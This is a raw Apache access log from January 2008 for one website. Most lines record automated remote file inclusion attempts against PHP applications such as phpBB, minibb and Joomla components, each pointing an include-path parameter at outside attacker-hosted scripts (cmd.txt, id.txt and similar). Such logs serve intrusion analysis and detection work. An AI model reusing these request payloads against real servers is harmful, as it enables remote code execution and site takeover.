202.67.153.114 - - [15/Jan/2008:10:31:04 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.67.153.114 - - [15/Jan/2008:10:31:04 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:32:20 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:32:20 -0800] "GET //components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:32:20 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.73 - - [15/Jan/2008:10:32:27 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:10:32:36 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [15/Jan/2008:10:33:17 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.54 - - [15/Jan/2008:10:33:54 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [15/Jan/2008:10:33:54 -0800] "GET //components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [15/Jan/2008:10:33:54 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:10:33:56 -0800] "GET /index.php?loc=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:10:33:56 -0800] "GET /logs/index.php?loc=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:33:59 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:33:59 -0800] "GET //components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:34:02 -0800] "GET /megumi/Necklace/27_Woods_and_Coral_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:34:17 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:34:17 -0800] "GET //components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:34:17 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:31 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:33 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:34 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:34 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:34 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:34:37 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:34:41 -0800] "GET //components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:34:41 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:34:43 -0800] "GET /megumi/Bracelet/7_Amethyst_Bracelet_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:45 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:45 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [15/Jan/2008:10:34:45 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://h1.ripway.com/xandriOS/scan/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:34:58 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:35:23 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:35:24 -0800] "GET //components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:10:35:24 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:35:25 -0800] "GET /megumi/Bracelet/3_Blue_Opal_Bracelet_35.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:35:47 -0800] "GET /megumi/Necklace/20_Brown_Horn_Choker_20.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:35:50 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:35:50 -0800] "GET //components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:10:35:50 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:10:35:52 -0800] "GET //components/minibb/index.php?absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [15/Jan/2008:10:36:05 -0800] "GET //components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:36:05 -0800] "GET /megumi/Necklace/14_White_Bone_Choker_20.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:10:36:54 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:10:36:54 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.241.213 - - [15/Jan/2008:10:36:54 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://pablofms.com/pablo/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:37:00 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:37:07 -0800] "GET /megumi/Necklace/9_Garnet_Pearl_Choker_35.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
59.148.232.98 - - [15/Jan/2008:10:37:12 -0800] "GET /sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [15/Jan/2008:10:37:26 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.208.82 - - [15/Jan/2008:10:37:32 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [15/Jan/2008:10:37:32 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [15/Jan/2008:10:37:33 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:38:53 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:38:53 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.234.200.226 - - [15/Jan/2008:10:39:00 -0800] "GET /logs/news/newstopic_inc.php?indir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.234.200.226 - - [15/Jan/2008:10:39:00 -0800] "GET /news/newstopic_inc.php?indir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:39:28 -0800] "GET /logs/access_071229.log/////////?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.245.164 - - [15/Jan/2008:10:39:28 -0800] "GET /logs/////////?CONFIG_EXT[LANGUAGES_DIR]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 200 30265 "-" "libwww-perl/5.69" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:10:39:54 -0800] "GET //components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:10:39:56 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:10:39:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:10:39:58 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.25.97.78 - - [15/Jan/2008:10:40:24 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.25.97.78 - - [15/Jan/2008:10:40:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.25.97.78 - - [15/Jan/2008:10:40:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.148.232.98 - - [15/Jan/2008:10:40:26 -0800] "GET /logs/access_071228.log/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [15/Jan/2008:10:40:26 -0800] "GET /sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [15/Jan/2008:10:40:26 -0800] "GET /logs/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:10:41:31 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:10:41:31 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:42:33 -0800] "GET /skin/zero_vote/error.php?dir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:10:42:33 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:10:43:23 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:10:43:24 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:10:43:24 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.179.126.38 - - [15/Jan/2008:10:43:25 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.143.232 - - [15/Jan/2008:10:43:27 -0800] "GET /logs/access_071221.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.22.125.219 - - [15/Jan/2008:10:43:58 -0800] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://64.22.125.219/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.3.207 - - [15/Jan/2008:10:44:09 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [15/Jan/2008:10:44:09 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [15/Jan/2008:10:44:09 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [15/Jan/2008:10:44:14 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:10:44:26 -0800] "GET /megumi/Necklace/4_Crystal_28_Turquoise_25.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
194.126.172.71 - - [15/Jan/2008:10:44:28 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.172.71 - - [15/Jan/2008:10:44:28 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.172.71 - - [15/Jan/2008:10:44:28 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:10:44:30 -0800] "GET /logs/access_071214.log//language/lang_german/lang_main_album.php?=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [15/Jan/2008:10:44:30 -0800] "GET //language/lang_german/lang_main_album.php?=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.172.71 - - [15/Jan/2008:10:44:33 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:10:44:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.bettysbluestarlounge.com/Calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
